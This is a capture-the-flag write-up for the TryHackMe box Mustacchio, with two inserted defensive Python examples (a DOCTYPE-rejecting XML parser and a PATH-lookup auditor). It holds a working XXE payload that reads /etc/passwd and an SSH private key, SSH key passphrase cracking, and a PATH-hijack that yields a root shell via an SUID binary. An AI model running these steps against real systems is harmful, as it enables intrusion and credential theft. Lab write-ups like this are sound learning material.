TryHackMe - Mustacchio

Here is Strupo_'s write-up for an "Easy boot2root Machine" called Mustacchio, by zyeinn, on TryHackMe.com.


The challenge was solved by conducting some basic enumeration, exploiting an XXE injection vulnerability, cracking a password, and leveraging an SUID binary to root the system. 

Enumeration

To begin, nmap was used to determine open ports:

$ nmap -p- --open -sV -v -Pn -oA nmap-mustacchio 10.10.81.167
<snip>
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
<snip>

Manually browsing to the two web servers revealed a mustache-themed blog on 80/tcp and an admin login prompt on 8765/tcp, shown in the screenshot below:

[Screenshot: Admin Panel Login]

Next, ffuf was used to enumerate content on the web server:

$ ffuf -u http://10.10.81.167/FUZZ -w /usr/share/wordlists/dirb/big.txt
<snip>
.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10]
custom                  [Status: 301, Size: 313, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 312, Words: 20, Lines: 10]
images                  [Status: 301, Size: 313, Words: 20, Lines: 10]
robots.txt              [Status: 200, Size: 28, Words: 3, Lines: 3]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [20470/20470] :: Job [1/1] :: 319 req/sec :: Duration: [0:01:04] :: Errors: 0 ::


There was not much under the /custom directory, so manually browsing through it and checking every file quickly turned up users.bak in /custom/js/:

$ wget http://10.10.81.167/custom/js/users.bak
<snip>

$ strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
<redacted hash>

A quick Google search of the hash returned the cleartext password.

Obtaining User Access

The password worked against the admin portal login page, behind which a large text entry box was observed. Looking at the HTML source also revealed the following comments of interest:

    <!-- Barry, you can now SSH in using your key!-->

and

    //document.cookie = "Example=/auth/dontforget.bak";

The contents of /auth/dontforget.bak can be seen below:

$ cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>

This backup file was used as a template for an XXE injection proof-of-concept:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY strupo SYSTEM "
php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/etc/passwd">]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&strupo;</com>
</comment>

This successfully rendered the base64-encoded contents of /etc/passwd. The first HTML comment mentioned SSH access with a key, so it was simply a matter of changing the resource value from /etc/passwd to /home/barry/.ssh/id_rsa.
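The comment form accepted user-supplied XML and let the parser honour the DOCTYPE, which is the whole reason the proof-of-concept above works. As an added illustration (not code from the write-up or from the box, whose handler is PHP judging by the php://filter wrapper), the Python below shows the fix a defender would want in the comment handler: abort parsing the moment a DOCTYPE appears, before any entity can be declared or resolved. The sample documents are constructed here and the SYSTEM path in the hostile one is a placeholder.

```python
import xml.parsers.expat

# Constructed sample: a benign comment in the dontforget.bak layout.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>Nice post.</com>
</comment>"""

# Constructed sample: the same layout carrying an external-entity DOCTYPE
# (the shape of the XXE proof-of-concept; the target path is a placeholder).
HOSTILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY x SYSTEM "file:///PLACEHOLDER/target">]>
<comment><name>a</name><author>b</author><com>&x;</com></comment>"""

ALLOWED = ("name", "author", "com")   # the only fields the form should carry


class DoctypeRejected(ValueError):
    """Raised when submitted XML tries to declare a DTD."""


def parse_comment(data: bytes) -> dict:
    """Parse a <comment> document, refusing any DOCTYPE / entity declaration."""
    fields, buf = {}, []
    p = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', i.e. before expat reads the entity declarations.
        raise DoctypeRejected("DOCTYPE declarations are not accepted")

    def end(tag):
        if tag in ALLOWED:
            fields[tag] = "".join(buf).strip()
        buf.clear()

    p.StartDoctypeDeclHandler = reject_doctype
    p.StartElementHandler = lambda tag, attrs: buf.clear()
    p.EndElementHandler = end
    p.CharacterDataHandler = buf.append   # expat may deliver text in chunks
    p.Parse(data, True)
    return fields


def handle_submission(data: bytes):
    """Return ('ok', fields) or ('rejected', reason), as the form handler would."""
    try:
        return "ok", parse_comment(data)
    except DoctypeRejected as e:
        return "rejected", str(e)
    except xml.parsers.expat.ExpatError as e:
        return "rejected", "malformed XML: %s" % e
```

Python's expat never resolves external entities on its own, so the DOCTYPE hook is belt-and-braces here; in a PHP handler the equivalent is to refuse DTDs (or use a parser mode that does not load them) before the document reaches the parser.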

To turn the base64 blob into an actual key, I copied the encoded text to a file and used the following command: base64 -d -w0 < b64.id_rsa > id_rsa

The key was password protected and so ssh2john was leveraged to generate a hash that could be cracked by john or hashcat:

$ python ssh2john.py id_rsa > id_rsa.hash

John failed to identify the hash, possibly due to the "id_rsa:" prefix in the output file from ssh2john.
 
Ultimately, I installed the beta version of hashcat and ran the following command to crack the hash after removing "id_rsa:" from the hash file:

$ sudo hashcat -m 22931 id_rsa.hash -a 0 --force /usr/share/wordlists/rockyou.txt

The password for the key was successfully cracked, and it was then a matter of using the key to connect to the box. I copied the private key to my local ~/.ssh/ directory, renamed it "barry", and used chmod 400 barry to set the required permissions on the file.

$ ssh -i ~/.ssh/barry barry@10.10.81.167
<snip>
barry@mustacchio:~$ ls -ltra
total 20
-rw-r--r-- 1 barry barry 33 Jun 12 15:48 user.txt
drwxr-xr-x 2 barry barry 4096 Jun 12 15:48 .ssh
drwxr-xr-x 4 root root 4096 Jun 12 15:48 ..
drwx------ 2 barry barry 4096 Jun 13 03:10 .cache
drwxr-xr-x 4 barry barry 4096 Jun 13 03:10 .
barry@mustacchio:~$ cat user.txt
<snip>

Privilege Escalation

In order to elevate to root, I noticed an interesting-looking binary in the /home/joe/ directory called "live_log". Using strings, I could see that it would simply tail -f the access.log file for the nginx web server.

Initially, I attempted to escape special-character encoding and inject control characters into the User-Agent, but this was a dead end for me.

Next, I checked whether it had the SUID bit set, and it did! A quick spot check is ls -l, where the "s" shows up in the owner's execute position of the permissions, but you can also do a system-wide search with find:

$ find / -perm -4000 2>/dev/null

I then did some searching just to make sure there wasn't some simple way of dropping to a shell, like you can with less, but I didn't find anything. Then it occurred to me that since the binary calls tail by its bare name rather than an absolute path, if I could put my own "tail" earlier in PATH I should be able to root the box.

I did this by performing the following steps:

barry@mustacchio:~$ mkdir bin && cd bin
barry@mustacchio:~/bin$ export PATH=$HOME/bin:$PATH
barry@mustacchio:~/bin$ nano foo
barry@mustacchio:~/bin# cat foo
#!/bin/bash
/bin/bash
barry@mustacchio:~/bin$ chmod +x foo
barry@mustacchio:~/bin$ ln -s foo tail
barry@mustacchio:~/bin$ ../../joe/./live_log
root@mustacchio:~# cd /root
root@mustacchio:/root# ls -l
total 4
-rw------- 1 root root 33 Jun 12 15:48 root.txt
root@mustacchio:/root# cat root.txt
<snip>
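The steps above work only because the SUID binary looks tail up through the PATH it inherits from the caller. As an added audit helper (not part of the write-up or the box), the Python below mimics the shell's lookup and classifies an invocation by whether the resolved program comes from a trusted directory, contrasting the inherited PATH with a pinned one and with an absolute path; the nginx log path is the distribution default and is assumed here.

```python
import os
import shlex
import tempfile

# Directories a privileged launcher should pin to instead of trusting the caller's PATH.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
# Assumed default nginx access log location (the write-up only says "access.log").
LOG = "/var/log/nginx/access.log"


def resolve_command(name: str, path_env: str):
    """Mimic the shell: first executable file named `name` along path_env, else None."""
    if os.sep in name:
        return name                      # explicit path, no search performed
    for d in path_env.split(os.pathsep):
        cand = os.path.join(d, name)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def audit_invocation(cmdline: str, path_env: str):
    """Classify what a privileged program would actually execute for `cmdline`."""
    prog = shlex.split(cmdline)[0]
    if os.path.isabs(prog):
        return "pinned", prog            # immune to PATH manipulation
    found = resolve_command(prog, path_env)
    if found is None:
        return "unresolved", prog
    if os.path.dirname(found) in TRUSTED_PATH.split(os.pathsep):
        return "relative-lookup", found  # works today, but still PATH-dependent
    return "caller-controlled", found    # resolved into a directory the caller owns


def demo():
    """Constructed scenario: a user-owned bin directory placed first in PATH."""
    tmp = tempfile.mkdtemp()
    fake = os.path.join(tmp, "tail")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho 'not the real tail'\n")   # harmless stand-in
    os.chmod(fake, 0o755)
    inherited = tmp + os.pathsep + TRUSTED_PATH
    return {
        "inherited": audit_invocation("tail -f " + LOG, inherited),
        "absolute":  audit_invocation("/usr/bin/tail -f " + LOG, inherited),
        "pinned":    audit_invocation("tail -f " + LOG, TRUSTED_PATH),
    }
```

The fix on the binary's side is the "absolute" row: invoke /usr/bin/tail (or reset PATH to TRUSTED_PATH before the call) so the caller's environment cannot choose which program runs with elevated privileges.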

Conclusion

This was my first challenge hosted on TryHackMe.com and I really enjoyed it and the service. Signing up was pain-free and it was easy to just jump right into the challenge.

Thanks for reading!

@strupo_

Find us on twitter: @teamWTG
